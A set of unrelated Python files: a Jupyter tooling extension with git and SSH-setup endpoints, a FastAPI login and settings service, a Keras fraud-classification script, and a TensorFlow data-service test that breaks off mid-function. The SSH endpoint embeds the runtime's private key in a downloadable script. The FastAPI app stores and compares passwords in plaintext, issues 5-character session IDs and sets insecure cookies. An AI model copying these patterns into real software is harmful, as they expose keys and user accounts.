repo.git.push("origin", "HEAD")
except git.GitCommandError as error:
if error.stderr and (
"No such device or address" in error.stderr
and "could not read Username" in error.stderr
):
raise Exception(
"User is not authenticated. Please use Ungit to login via HTTPS or use SSH authentication."
)
else:
raise error
def get_config_value(key: str, repo=None):
try:
if repo:
return repo.git.config(key)
# no repo, look up global config
return execute_command("git config " + key)
except Exception:
return None
def get_user_name(repo=None):
return get_config_value("user.name", repo)
def get_user_email(repo=None):
return get_config_value("user.email", repo)
def get_active_branch(repo) -> str or None:
try:
return repo.active_branch.name
except Exception:
return None
def get_last_commit(repo) -> str or None:
try:
return datetime.fromtimestamp(repo.head.commit.committed_date).strftime(
"%d.%B %Y %I:%M:%S"
)
except Exception:
return None
def has_file_changed(repo, file_path: str):
# not working in all situations
changed_files = [item.a_path for item in repo.index.diff(None)]
return os.path.relpath(os.path.realpath(file_path), repo.working_dir) in (
path for path in changed_files
)
def get_git_info(directory: str):
repo = get_repo(directory)
git_info = {
"userName": get_user_name(repo),
"userEmail": get_user_email(repo),
"repoRoot": repo.working_dir if repo else None,
"activeBranch": get_active_branch(repo) if repo else None,
"lastCommit": get_last_commit(repo) if repo else None,
"requestPath": directory,
}
return git_info
def _get_server_root() -> str:
return os.path.expanduser(web_app.settings["server_root_dir"])
def _resolve_path(path: str) -> str or None:
if path:
# add jupyter server root directory
if path.startswith("/"):
path = path[1:]
return os.path.join(_get_server_root(), path)
else:
return None
# ------------- SSH Functions ------------------------
def handle_ssh_script_request(handler):
origin = handler.get_argument("origin", None)
host = handler.get_argument("host", None)
port = handler.get_argument("port", None)
if not host and origin:
host, _ = parse_endpoint_origin(origin)
if not port and origin:
_, port = parse_endpoint_origin(origin)
if not host:
handle_error(
handler,
400,
"Please provide a host via get parameter. Alternatively, you can also specify an origin with the full endpoint url.",
)
return
if not port:
handle_error(
handler,
400,
"Please provide a port via get parameter. Alternatively, you can also specify an origin with the full endpoint url.",
)
return
setup_script = get_setup_script(host, port)
download_script_flag = handler.get_argument("download", None)
if download_script_flag and download_script_flag.lower().strip() == "true":
# Use host, otherwise it cannot be reconstructed in tooling plugin
file_name = "setup_ssh_{}-{}".format(host.lower().replace(".", "-"), port)
SSH_JUMPHOST_TARGET = os.environ.get("SSH_JUMPHOST_TARGET", "")
if SSH_JUMPHOST_TARGET:
# add name if variabl is set
file_name += "-" + SSH_JUMPHOST_TARGET.lower().replace(".", "-")
file_name += ".sh"
handler.set_header("Content-Type", "application/octet-stream")
handler.set_header(
"Content-Disposition", "attachment; filename=" + file_name
) # Hostname runtime
handler.write(setup_script)
handler.finish()
else:
handler.finish(setup_script)
def parse_endpoint_origin(endpoint_url: str):
# get host and port from endpoint url
from urllib.parse import urlparse
endpoint_url = urlparse(endpoint_url)
hostname = endpoint_url.hostname
port = endpoint_url.port
if not port:
port = 80
if endpoint_url.scheme == "https":
port = 443
return hostname, str(port)
def generate_token(base_url: str):
private_ssh_key_path = HOME + "/.ssh/id_ed25519"
with open(private_ssh_key_path, "r") as f:
runtime_private_key = f.read()
import hashlib
key_hasher = hashlib.sha1()
key_hasher.update(str.encode(str(runtime_private_key).lower().strip()))
key_hash = key_hasher.hexdigest()
token_hasher = hashlib.sha1()
token_str = (key_hash + base_url).lower().strip()
token_hasher.update(str.encode(token_str))
return str(token_hasher.hexdigest())
def get_setup_script(hostname: str = None, port: str = None):
private_ssh_key_path = HOME + "/.ssh/id_ed25519"
with open(private_ssh_key_path, "r") as f:
runtime_private_key = f.read()
ssh_templates_path = os.path.dirname(os.path.abspath(__file__)) + "/setup_templates"
with open(ssh_templates_path + "/client_command.txt", "r") as file:
client_command = file.read()
SSH_JUMPHOST_TARGET = os.environ.get("SSH_JUMPHOST_TARGET", "")
is_runtime_manager_existing = False if SSH_JUMPHOST_TARGET == "" else True
RUNTIME_CONFIG_NAME = "workspace-"
if is_runtime_manager_existing:
HOSTNAME_RUNTIME = SSH_JUMPHOST_TARGET
HOSTNAME_MANAGER = hostname
PORT_MANAGER = port
PORT_RUNTIME = os.getenv("WORKSPACE_PORT", "8080")
RUNTIME_CONFIG_NAME = RUNTIME_CONFIG_NAME + "{}-{}-{}".format(
HOSTNAME_RUNTIME, HOSTNAME_MANAGER, PORT_MANAGER
)
client_command = (
client_command.replace("{HOSTNAME_MANAGER}", HOSTNAME_MANAGER)
.replace("{PORT_MANAGER}", str(PORT_MANAGER))
.replace("#ProxyCommand", "ProxyCommand")
)
local_keyscan_replacement = "{}".format(HOSTNAME_RUNTIME)
else:
HOSTNAME_RUNTIME = hostname
PORT_RUNTIME = port
RUNTIME_CONFIG_NAME = RUNTIME_CONFIG_NAME + "{}-{}".format(
HOSTNAME_RUNTIME, PORT_RUNTIME
)
local_keyscan_replacement = "[{}]:{}".format(HOSTNAME_RUNTIME, PORT_RUNTIME)
# perform keyscan with localhost to get the runtime's keyscan result.
# Replace then the "localhost" part in the returning string with the actual RUNTIME_HOST_NAME
local_keyscan_entry = get_ssh_keyscan_results("localhost")
if local_keyscan_entry is not None:
local_keyscan_entry = local_keyscan_entry.replace(
"localhost", local_keyscan_replacement
)
output = (
client_command.replace("{PRIVATE_KEY_RUNTIME}", runtime_private_key)
.replace("{HOSTNAME_RUNTIME}", HOSTNAME_RUNTIME)
.replace("{RUNTIME_KNOWN_HOST_ENTRY}", local_keyscan_entry)
.replace("{PORT_RUNTIME}", str(PORT_RUNTIME))
.replace("{RUNTIME_CONFIG_NAME}", RUNTIME_CONFIG_NAME)
.replace(
"{RUNTIME_KEYSCAN_NAME}",
local_keyscan_replacement.replace("[", "\[").replace("]", "\]"),
)
)
return output
def get_ssh_keyscan_results(host_name, host_port=22, key_format="ecdsa"):
"""
Perform the keyscan command to get the certicicate fingerprint (of specified format [e.g. rsa256, ecdsa, ...]) of the container.
# Arguments
- host_name (string): hostname which to scan for a key
- host_port (int): port which to scan for a key
- key_format (string): type of the key to return. the `ssh-keyscan` command usually lists the fingerprint in different formats (e.g. ecdsa-sha2-nistp256, ssh-rsa, ssh-ed25519, ...). The ssh-keyscan result is grepped for the key_format, so already a part could match. In that case, the last match is used.
# Returns
The keyscan entry which can be added to the known_hosts file. If `key_format` matches multiple results of `ssh-keyscan`, the last match is returned. If no match exists, it returns empty
"""
keyscan_result = subprocess.run(
["ssh-keyscan", "-p", str(host_port), host_name], stdout=subprocess.PIPE
)
keys = keyscan_result.stdout.decode("utf-8").split("\n")
keyscan_entry = ""
for key in keys:
if key_format in key:
keyscan_entry = key
return keyscan_entry
# ------------- PLUGIN LOADER ------------------------
def load_jupyter_server_extension(nb_server_app) -> None:
# registers all handlers as a REST interface
global web_app
global log
web_app = nb_server_app.web_app
log = nb_server_app.log
host_pattern = ".*$"
# SharedSSHHandler
route_pattern = url_path_join(web_app.settings["base_url"], "/tooling/ping")
web_app.add_handlers(host_pattern, [(route_pattern, PingHandler)])
route_pattern = url_path_join(web_app.settings["base_url"], "/tooling/tools")
web_app.add_handlers(host_pattern, [(route_pattern, ToolingHandler)])
route_pattern = url_path_join(
web_app.settings["base_url"], "/tooling/tool-installers"
)
web_app.add_handlers(host_pattern, [(route_pattern, InstallToolHandler)])
route_pattern = url_path_join(web_app.settings["base_url"], "/tooling/token")
web_app.add_handlers(host_pattern, [(route_pattern, SharedTokenHandler)])
route_pattern = url_path_join(web_app.settings["base_url"], "/tooling/git/info")
web_app.add_handlers(host_pattern, [(route_pattern, GitInfoHandler)])
route_pattern = url_path_join(web_app.settings["base_url"], "/tooling/git/commit")
web_app.add_handlers(host_pattern, [(route_pattern, GitCommitHandler)])
web_app.add_handlers(
host_pattern,
[
(
url_path_join(web_app.settings["base_url"], "/tooling/storage/check"),
StorageCheckHandler,
)
],
)
route_pattern = url_path_join(
web_app.settings["base_url"], "/tooling/ssh/setup-script"
)
web_app.add_handlers(host_pattern, [(route_pattern, SSHScriptHandler)])
route_pattern = url_path_join(
web_app.settings["base_url"], "/tooling/ssh/setup-command"
)
web_app.add_handlers(host_pattern, [(route_pattern, SSHCommandHandler)])
route_pattern = url_path_join(web_app.settings["base_url"], "/tooling/files/link")
web_app.add_handlers(host_pattern, [(route_pattern, SharedFilesHandler)])
route_pattern = url_path_join(web_app.settings["base_url"], SHARED_SSH_SETUP_PATH)
web_app.add_handlers(host_pattern, [(route_pattern, SharedSSHHandler)])
log.info("Extension jupyter-tooling-widget loaded successfully.")
# Test routine. Can be invoked manually
if __name__ == "__main__":
application = tornado.web.Application([(r"/test", HelloWorldHandler)])
application.listen(555)
tornado.ioloop.IOLoop.current().start()
|
main.py | from typing import Optional
from pydantic import BaseModel
from fastapi import FastAPI, Response, Request, status
from fastapi import responses
from fastapi.responses import JSONResponse
from fastapi.middleware.cors import CORSMiddleware
from sqlalchemy import create_engine, Column, String, Integer, JSON, or_
from sqlalchemy.orm import sessionmaker
from sqlalchemy.ext.declarative import declarative_base
import random
import string
from datetime import datetime, timedelta
import time
import uvicorn
#for multiprocesing
import threading
MOTD = "Welcome to the site"
SESSION_TIMEOUT_PERIOD_MINUTES = 30
SESSION_COLLECTOR_PERIOD_SECONDS = 60
SESSION_ID_SIZE_SYMBOLS = 5
#SQLALCHAMY_DATABASE_URL = 'mysql://remote_user:User_1234@192.168.0.105:3306/fastapi_test'
SQLALCHAMY_DATABASE_URL = 'sqlite:///site.db'
class session():
def isValid(self):
if datetime.utcnow() >= self.expire_time:
return False
else:
return True
def __init__(self, sess_id, username, expire_time:datetime):
self.sess_id = sess_id
self.expire_time = expire_time
self.username = username
class sessionManager():
def _sessionCollectorThread(self, timeout):
while(self.runCollector):
self.deleteInvalidSessions()
time.sleep(timeout)
def sessionCollectorStart(self, timeout):
if self.runCollector is not True:
self.runCollector = True
self.collector = threading.Thread(target = self._sessionCollectorThread, daemon = True, args = (timeout,))
self.collector.start()
def sessionCollectorStop(self):
self.runCollector = False
def deleteInvalidSessions(self):
for session in list(self.sessions):
if session.isValid():
pass
else:
self.sessions.remove(session)
def getSessionByID(self, id):
sess=None
for session in self.sessions:
if session.sess_id == id:
if session.isValid():
sess = session
else:
self.deleteInvalidSessions()
break
return sess
def addSession(self, session:session):
self.sessions.append(session)
def removeSessionById(self, id):
for session in list(self.sessions):
if session.sess_id == id:
self.sessions.remove(session)
else:
pass
def __init__(self):
self.sessions = []
self.runCollector = False
def sessIdGenerator(N):
return ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(N))
class Credentials(BaseModel):
username:str
password:str
class UpdateSetting(BaseModel):
setting_id:int
value:dict
Base = declarative_base()
class User(Base):
__tablename__ = "users"
username = Column(String, primary_key = True)
password = Column(String)
def __init__(self, username, password):
self.username = username
self.password = password
class Setting(Base):
__tablename__ = "settings"
setting_id = Column(Integer, primary_key = True, autoincrement = True)
device_name = Column(String)
setting_name = Column(String)
setting_type = Column(String)
value = Column(JSON)
def toDict(self):
x = {
"setting_id" : self.setting_id,
"device_name" : self.device_name,
"setting_name" : self.setting_name,
"setting_type" : self.setting_type,
"value" : self.value
}
return x
def __init__(self, device_name, setting_name, setting_type, value):
self.device_name = device_name
self.setting_name = setting_name
self.setting_type = setting_type
self.value = value
class SettingAccess(Base):
__tablename__ = "settings_access"
id = Column(Integer, primary_key = True, autoincrement = True)
setting_id = Column(Integer)
username = Column(String)
def __init__(self, setting_id, username):
self.setting_id = setting_id
self.username = username
class Device():
def toDict(self):
_settings = self.settings
for i,s in enumerate(self.settings):
_settings[i] = s.toDict()
x = {
"device_name" : self.name,
"settings" : _settings
}
return x
def __init__(self, name:string, settings:list):
self.name = name
self.settings = settings
sm = sessionManager()
#engine = create_engine(SQLALCHAMY_DATABASE_URL)
engine = create_engine(SQLALCHAMY_DATABASE_URL, connect_args={"check_same_thread":False})
sqlSession= sessionmaker(bind=engine, autocommit=False,)()
def getSettingsForUserSortedByDevice(sess_id):
username = sm.getSessionByID(sess_id).username
accessibleSettingIds = [sa.setting_id for sa in sqlSession.query(SettingAccess).filter(SettingAccess.username == username).all()]
accessibleSettings = [s for s in sqlSession.query(Setting).filter(Setting.setting_id.in_(accessibleSettingIds)).all()]
devices=[]
def isInList(name):
for i,d in enumerate(devices):
if (d.name == name):
return i
return -1
for s in accessibleSettings:
i = isInList(s.device_name)
if i >= 0:
devices[i].settings.append(s)
else:
devices.append(Device(s.device_name, [s,]))
devices = [d.toDict() for d in devices]
return devices
def getAccessibleSettingsIds(sess_id):
username = sm.getSessionByID(sess_id).username
accessibleSettingIds = [sa.setting_id for sa in sqlSession.query(SettingAccess).filter(SettingAccess.username == username).all()]
return accessibleSettingIds
def validateSettingUpdate(updatedSetting:UpdateSetting, s:Setting):
setting_type = s.setting_type
value = updatedSetting.value
#INTEGER
if (type(value["value"]) is int) and setting_type == "integer":
return True
#BOOLEAN
elif (type(value["value"]) is bool) and setting_type == "boolean":
return True
else:
return False
origins = [
"http://127.0.0.1:3000",
"http://192.168.1.201:3000"
]
app = FastAPI()
app.add_middleware(
CORSMiddleware,
allow_origins=origins,
allow_credentials=True,
allow_methods=["*"],
allow_headers=["*"],
)
@app.get("/", tags = ["general"])
def root(response: Response):
return {"motd": MOTD}
@app.post("/login", tags = ["authentication"])
def login(response:Response, credentials:Credentials):
result = sqlSession.query(User).filter(User.username == credentials.username).first()
if result:
if result.password == credentials.password:
sess_id=sessIdGenerator(SESSION_ID_SIZE_SYMBOLS)
time = (datetime.utcnow() + timedelta(minutes = SESSION_TIMEOUT_PERIOD_MINUTES))
response.set_cookie(key="SESS_ID", value=sess_id,expires = time.ctime(), samesite = "strict", secure = False)
sess=session(sess_id, credentials.username, time)
sm.addSession(sess)
sm.sessionCollectorStart(SESSION_COLLECTOR_PERIOD_SECONDS)
return {"status":"Successful login"}
else:
response.status_code = status.HTTP_401_UNAUTHORIZED
return {"status":"Wrong credentials"}
else:
response.status_code = status.HTTP_401_UNAUTHORIZED
return {"status":"Wrong credentials"}
@app.get("/checksession", tags = ["authentication"])
def checkSession(request:Request, response:Response):
if "SESS_ID" in request.cookies:
sess=sm.getSessionByID(request.cookies["SESS_ID"])
if sess is not None:
response.status_code = status.HTTP_200_OK
return {"status" : "Valid", "username" : sess.username}
else:
response.status_code = status.HTTP_403_FORBIDDEN
return {"status": "Invalid"}
else:
response.status_code = status.HTTP_401_UNAUTHORIZED
return {"status": "Invalid"}
@app.post("/logout", tags = ["authentication"])
def logout(request:Request, response:Response):
if "SESS_ID" in request.cookies:
sess=sm.getSessionByID(request.cookies["SESS_ID"])
if sess is not None:
response.status_code = status.HTTP_200_OK
sm.removeSessionById(sess.sess_id)
return {"status" : "Logged out", "username" : sess.username}
else:
response.status_code = status.HTTP_404_NOT_FOUND
return {"status": "Session not found"}
else:
response.status_code = status.HTTP_401_UNAUTHORIZED
return {"status": "No token applied to request"}
@app.get("/user", tags = ["user content"])
def userpage(request:Request, response:Response):
if "SESS_ID" in request.cookies:
sess=sm.getSessionByID(request.cookies["SESS_ID"])
if sess is not None:
response.status_code = status.HTTP_200_OK
return {"userdata" : "This is test user data"}
else:
response.status_code = status.HTTP_403_FORBIDDEN
return {"status": "No session"}
else:
response.status_code = status.HTTP_401_UNAUTHORIZED
return {"status": "No token applied to request"}
@app.get("/user/settings", tags = ["user content"])
def userSettings(request:Request, response:Response):
returnStatus = "No token applied to request"
devices = []
if "SESS_ID" in request.cookies:
sess=sm.getSessionByID(request.cookies["SESS_ID"])
if sess is not None:
response.status_code = status.HTTP_200_OK
returnStatus = "Success"
devices = getSettingsForUserSortedByDevice(request.cookies["SESS_ID"])
else:
response.status_code = status.HTTP_403_FORBIDDEN
return {"status": "No session"}
else:
response.status_code = status.HTTP_401_UNAUTHORIZED
return {"status": "No token applied to request"}
return {"status" : returnStatus, "devices" : devices}
@app.put("/user/settings/{id:int}", tags = ["user content"])
def updateSetting(updatedSetting:UpdateSetting, response:Response, request:Request, id):
returnStatus = "No token applied to request"
if "SESS_ID" in request.cookies:
sess=sm.getSessionByID(request.cookies["SESS_ID"])
if sess is not None:
accessibleSettingsIds = getAccessibleSettingsIds(request.cookies["SESS_ID"])
if id in accessibleSettingsIds:
s = sqlSession.query(Setting).filter(Setting.setting_id == id).one()
if s is not None:
if validateSettingUpdate(updatedSetting, s):
response.status_code = status.HTTP_200_OK
returnStatus = "Success"
s.value = updatedSetting.value
sqlSession.commit()
else:
response.status_code = status.HTTP_422_UNPROCESSABLE_ENTITY
returnStatus = "Invalid value type "
else:
response.status_code = status.HTTP_404_NOT_FOUND
returnStatus = "No setting with that id"
else:
response.status_code = status.HTTP_403_FORBIDDEN
returnStatus = "No user access to that setting"
else:
response.status_code = status.HTTP_403_FORBIDDEN
return {"status": "No session"}
else:
response.status_code = status.HTTP_401_UNAUTHORIZED
return {"status": "No token applied to request"}
return {"status" : returnStatus}
|
allofmethod.py | import pandas as pd
import numpy as np
from keras.models import Sequential
from keras.layers import Dense
from keras.utils import to_categorical
import time
import multiprocessing as mp
start_time=time.time()
def deepl(location1,location2):
data=pd.read_csv(location1)
data_columns=data.columns
xtrain = data[data_columns[data_columns != 'typeoffraud']]
ytrain=data['typeoffraud']
data1=pd.read_csv(location2)
data1_columns=data1.columns
xtest = data1[data1_columns[data1_columns != 'typeoffraud']]
ytest=data1['typeoffraud']
xtrain_norm = (xtrain - xtrain.mean()) / xtrain.std()
xtest_norm = (xtest - xtest.mean()) / xtest.std()
n_cols = xtrain_norm.shape[1]
ytrain=to_categorical(ytrain)
ytest=to_categorical(ytest)
num_classes=ytrain.shape[1]
def classification_model():
# create model
model = Sequential()
model.add(Dense(100,activation='relu', input_shape=(n_cols,)))
model.add(Dense(100, activation='relu'))
model.add(Dense(num_classes, activation='softmax'))
# compile model
model.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])
return model
# build the model
model = classification_model()
# fit the model
model.fit(xtrain_norm, ytrain, validation_data=(xtest_norm, ytest), epochs=10, verbose=1)
# evaluate the model
# test_loss,test_acc=model.evaluate(xtest_norm, ytest)
test_labels_p=model.predict(xtest_norm)
test_labels_p=np.argmax(test_labels_p,axis=1)
rel=list(zip(test_labels_p))
pp=pd.DataFrame(data=rel,columns=['label'])
pp.to_csv('label.csv',index=False)
################################################################################################################
def maketags(location2,location3):
e=pd.read_csv(location2)
tags=[]
ids=[]
tags1=[]
ids1=[]
for i,l in enumerate(e['typeoffraud']):
if l==1 or l==2 or l==3:
ids.append(e.iloc[i,1])
tags.append(e.iloc[i,4])
if l==4 or l==5 or l==6:
ids1.append(e.iloc[i,1])
tags1.append(e.iloc[i,4])
rel=list(zip(ids,tags))
pp=pd.DataFrame(data=rel,columns=['ids','tags'])
pp.to_csv('labelofhead.csv',index=False)
rel1=list(zip(ids1,tags1))
pp1=pd.DataFrame(data=rel1,columns=['ids','tags'])
pp1.to_csv('labelofcol.csv',index=False)
e1=pd.read_csv(location3)
x=list(e['ids'])
y=list(e1['label'])
rel=list(zip(x,y))
pp=pd.DataFrame(data=rel,columns=['ids','tags'])
pp.to_csv('labelofmethod.csv',index=False)
locationnew="labelofmethod.csv"
e=pd.read_csv(locationnew)
idof=[]
tag=[]
idof1=[]
tag1=[]
for i,l in enumerate(e['tags']):
if l==1 or l==2 or l==3:
idof.append(e.iloc[i,0])
tag.append(e.iloc[i,1])
if l==4 or l==5 or l==6:
idof1.append(e.iloc[i,0])
tag1.append(e.iloc[i,1])
rel=list(zip(idof,tag))
pp=pd.DataFrame(data=rel,columns=['ids','tags'])
pp.to_csv('labelofheadM.csv',index=False)
rel1=list(zip(idof1,tag1))
pp1=pd.DataFrame(data=rel1,columns=['ids','tags'])
pp1.to_csv('labelofcolM.csv',index=False)
########################################################################################################
def evalofhead(location4,location5):
e=pd.read_csv(location4)
e1=pd.read_csv(location5)
truepositive=[]
falsengative=[]
falsepositive=[]
precision=0
recall=0
f=0
ids=list(e['ids'])
ids1=list(e1['ids'])
for item in ids:
if item in ids1:
truepositive.append(item)
else:
falsengative.append(item)
for item1 in ids1:
if item1 in ids:
pass
else:
falsepositive.append(item1)
tp=len(truepositive)
fn=len(falsengative)
fp=len(falsepositive)
precision=(tp/(tp+fp))
recall=(tp/(tp+fn))
f=2*((precision*recall)/(precision+recall))
print("%s :precision for head detection"%precision)
print("%s :recall for head detection"%recall)
print("%s :f-measure for head detection"%f)
############################################################################################################
def evalofcol(location6,location7):
e=pd.read_csv(location6)
e1=pd.read_csv(location7)
truepositive=[]
falsengative=[]
falsepositive=[]
precision=0
recall=0
f=0
ids=list(e['ids'])
ids1=list(e1['ids'])
for item in ids:
if item in ids1:
truepositive.append(item)
else:
falsengative.append(item)
for item1 in ids1:
if item1 in ids:
pass
else:
falsepositive.append(item1)
tp=len(truepositive)
fn=len(falsengative)
fp=len(falsepositive)
precision=(tp/(tp+fp))
recall=(tp/(tp+fn))
f=2*((precision*recall)/(precision+recall))
print("%s :precision for colleague detection"%precision)
print("%s :recall for colleague detection"%recall)
print("%s :f-measure for colleague detection"%f)
############################################################################################################
location1="dataforDl.csv"
location2="dataforDl1.csv"
location3='label.csv'
location4="labelofhead.csv"
location5="labelofheadM.csv"
location6="labelofcol.csv"
location7="labelofcolM.csv"
p1= mp.Process(target=deepl, args=(location1,location2))
p1.start()
p1.join()
p2= mp.Process(target=maketags, args=(location2,location3))
p2.start()
p2.join()
evalofhead(location4,location5)
evalofcol(location6,location7)
print('---%s seconds---'%(time.time()-start_time)) |
data_service_ops_ft_test.py | # Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tf.data service ops where servers are started late or preempted."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import threading
import time
from absl.testing import parameterized
from tensorflow.python.data.experimental.kernel_tests import data_service_test_base
from tensorflow.python.data.experimental.ops import data_service_ops
from tensorflow.python.data.kernel_tests import test_base
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.framework import combinations
from tensorflow.python.framework import dtypes
from tensorflow.python.ops import array_ops
from tensorflow.python.platform import test
TMP_WORK_DIR = data_service_test_base.TMP_WORK_DIR
NO_WORK_DIR = data_service_test_base.NO_WORK_DIR
class DataServiceOpsTest(data_service_test_base.TestBase,
parameterized.TestCase):
@combinations.generate(test_base.eager_only_combinations())
def testDispatcherStop(self):
cluster = data_service_test_base.TestCluster(num_workers=1)
num_elements = 100
ds = self.make_distributed_range_dataset(num_elements, cluster)
iterator = iter(ds)
results = []
results.append(next(iterator).numpy())
cluster.stop_dispatcher()
# After the dispatcher dies, the worker should continue providing the rest
# of the dataset's elements.
for _ in range(num_elements - 1):
results.append(next(iterator).numpy())
self.assertEqual(results, list(range(num_elements)))
@combinations.generate(test_base.eager_only_combinations())
def testDispatcherRestartBeforeReading(self):
cluster = data_service_test_base.TestCluster(num_workers=1)
num_elements = 100
ds = self.make_distributed_range_dataset(num_elements, cluster)
cluster.restart_dispatcher()
self.assertDatasetProduces(ds, list(range(num_elements)))
@combinations.generate(test_base.eager_only_combinations())
def testDispatcherRestartDuringReading(self):
cluster = data_service_test_base.TestCluster(num_workers=1)
num_elements = 100
ds = self.make_distributed_range_dataset(num_elements, cluster)
iterator = iter(ds)
results = []
for _ in range(num_elements // 2):
results.append(next(iterator).numpy())
cluster.restart_dispatcher()
for elem in iterator:
results.append(elem.numpy())
self.assertEqual(list(range(num_elements)), results)
@combinations.generate(test_base.eager_only_combinations())
def testDispatcherRestartDuringDistributedEpoch(self):
cluster = data_service_test_base.TestCluster(num_workers=1)
num_elements = 100
ds = self.make_distributed_range_dataset(
num_elements, cluster, processing_mode="distributed_epoch")
iterator = iter(ds)
results = []
for _ in range(num_elements // 2):
results.append(next(iterator).numpy())
cluster.restart_dispatcher()
for elem in iterator:
results.append(elem.numpy())
self.assertEqual(list(range(num_elements)), results)
@combinations.generate(test_base.eager_only_combinations())
def testDispatcherRestartDuringDistributedEpochRepeat(self):
cluster = data_service_test_base.TestCluster(num_workers=1)
num_elements = 100
repetitions = 5
breakpoints = [50, 250, 450, 500]
ds = dataset_ops.Dataset.range(num_elements)
ds = ds.repeat(repetitions)
ds = self.make_distributed_dataset(
ds, cluster, processing_mode="distributed_epoch")
iterator = iter(ds)
results = []
for breakpoint in breakpoints:
for _ in range(len(results), breakpoint):
results.append(next(iterator).numpy())
cluster.restart_dispatcher()
self.assertCountEqual(repetitions * list(range(num_elements)), results)
@combinations.generate(test_base.eager_only_combinations())
def testDispatcherRestartBetweenIterations(self):
cluster = data_service_test_base.TestCluster(num_workers=1)
num_elements = 100
ds = self.make_distributed_range_dataset(100, cluster)
self.assertDatasetProduces(ds, list(range(num_elements)))
cluster.restart_dispatcher()
self.assertDatasetProduces(ds, list(range(num_elements)))
@combinations.generate(test_base.eager_only_combinations())
def testDispatcherManyRestarts(self):
cluster = data_service_test_base.TestCluster(num_workers=1)
num_elements_start = 10
num_elements_end = 15
datasets = []
for num_elements in range(num_elements_start, num_elements_end):
datasets.append(
self.make_distributed_range_dataset(num_elements, cluster))
cluster.restart_dispatcher()
for ds, num_elements in zip(datasets,
range(num_elements_start, num_elements_end)):
self.assertDatasetProduces(ds, list(range(num_elements)))
@combinations.generate(test_base.eager_only_combinations())
def testDispatcherAndWorkerRestart(self):
cluster = data_service_test_base.TestCluster(num_workers=1)
num_elements = 100
ds = self.make_distributed_range_dataset(num_elements, cluster)
cluster.restart_dispatcher()
cluster.workers[0].restart()
self.assertDatasetProduces(ds, list(range(num_elements)))
cluster.restart_dispatcher()
cluster.workers[0].restart()
self.assertDatasetProduces(ds, list(range(num_elements)))
@combinations.generate(
combinations.times(test_base.eager_only_combinations(),
combinations.combine(workers_to_add=[1, 3, 10])))
def testRoundRobinAddWorkers(self, workers_to_add):
starting_workers = 3
cluster = data_service_test_base.TestCluster(num_workers=starting_workers)
# Round robin reads can cause slow cluster shutdown.
data_service_test_base.GLOBAL_CLUSTERS.add(cluster)
num_consumers = 7
ds = self.make_round_robin_dataset(cluster, num_consumers)
get_next = self.getNext(ds, requires_initialization=True)
results = []
zeros_seen = 0
for _ in range(50):
results.append(self.evaluate(get_next()))
if results[-1] == 0:
zeros_seen += 1
for _ in range(workers_to_add):
cluster.add_worker()
# Read until all new workers have joined.
while zeros_seen < starting_workers + workers_to_add:
results.append(self.evaluate(get_next()))
if results[-1] == 0:
zeros_seen += 1
# Read some more.
for _ in range(100):
results.append(self.evaluate(get_next()))
self.checkRoundRobinGroups(results, num_consumers)
@combinations.generate(test_base.eager_only_combinations())
def testRoundRobinRestartWorker(self):
num_workers = 3
# Set a shutdown quiet period to prevent workers from shutting down partway
# through a round.
cluster = data_service_test_base.TestCluster(
num_workers, worker_shutdown_quiet_period_ms=2000)
# Round robin reads can cause slow cluster shutdown.
data_service_test_base.GLOBAL_CLUSTERS.add(cluster)
num_consumers = 5
ds = self.make_round_robin_dataset(cluster, num_consumers)
get_next = self.getNext(ds, requires_initialization=True)
results = []
self.read(get_next, results, 100)
cluster.workers[1].stop()
# Check that we can continue to read even with a worker stopped.
self.read(get_next, results, 100)
cluster.workers[1].restart()
# Read until we get results from the restarted worker, then read some more.
while results[-1] != 0:
results.append(self.evaluate(get_next()))
self.read(get_next, results, 100)
self.checkRoundRobinGroups(results, num_consumers)
@combinations.generate(test_base.eager_only_combinations())
def testRoundRobinMultiStartStop(self):
num_workers = 3
# Set a shutdown quiet period to prevent workers from shutting down partway
# through a round.
cluster = data_service_test_base.TestCluster(
num_workers, worker_shutdown_quiet_period_ms=2000)
# Round robin reads can cause slow cluster shutdown.
data_service_test_base.GLOBAL_CLUSTERS.add(cluster)
num_consumers = 5
ds = self.make_round_robin_dataset(cluster, num_consumers)
get_next = self.getNext(ds, requires_initialization=True)
results = []
self.read(get_next, results, 100)
for i in range(num_workers):
cluster.workers[i].stop()
self.read(get_next, results, 100)
cluster.workers[i].restart()
self.read(get_next, results, 100)
cluster.add_worker()
cluster.restart_dispatcher()
for i in range(num_workers):
cluster.workers[i].stop()
self.read(get_next, results, 100)
self.checkRoundRobinGroups(results, num_consumers)
@combinations.generate(test_base.eager_only_combinations())
def testDispatcherAndMultiWorkerRestart(self):
num_workers = 2
cluster = data_service_test_base.TestCluster(num_workers=num_workers)
num_elements = 100
ds = self.make_distributed_range_dataset(num_elements, cluster)
iterator = iter(ds)
results = []
cluster.restart_dispatcher()
for worker_index in range(num_workers):
cluster.workers[worker_index].restart()
for elem in iterator:
results.append(elem.numpy())
self.assertCountEqual(num_workers * list(range(num_elements)), results)
cluster.restart_dispatcher()
for worker_index in range(num_workers):
cluster.workers[worker_index].restart()
for elem in iterator:
results.append(elem.numpy())
self.assertCountEqual(num_workers * list(range(num_elements)), results)
@combinations.generate(test_base.eager_only_combinations())
def testStartServersLate(self):
# Test that the data service client performs retries instead of failing when
# the dataset is created before the master and worker are started.
try:
import portpicker # pylint: disable=g-import-not-at-top
dispatcher_port = portpicker.pick_unused_port()
except:
raise self.skipTest("Flakes in portpicker library do not represent "
"TensorFlow errors.")
cluster = data_service_test_base.TestCluster(
num_workers=1, dispatcher_port=dispatcher_port, start=False)
def start_servers():
time.sleep(0.5)
cluster.start_dispatcher()
cluster.start_workers()
start_servers_thread = threading.Thread(target=start_servers, daemon=True)
start_servers_thread.start()
num_elements = 10
ds = self.make_distributed_range_dataset(num_elements, cluster)
results = [elem.numpy() for elem in ds]
self.assertEqual(list(range(num_elements)), results)
start_servers_thread.join()
@combinations.generate(test_base.eager_only_combinations())
def testAddWorkerMidJob(self):
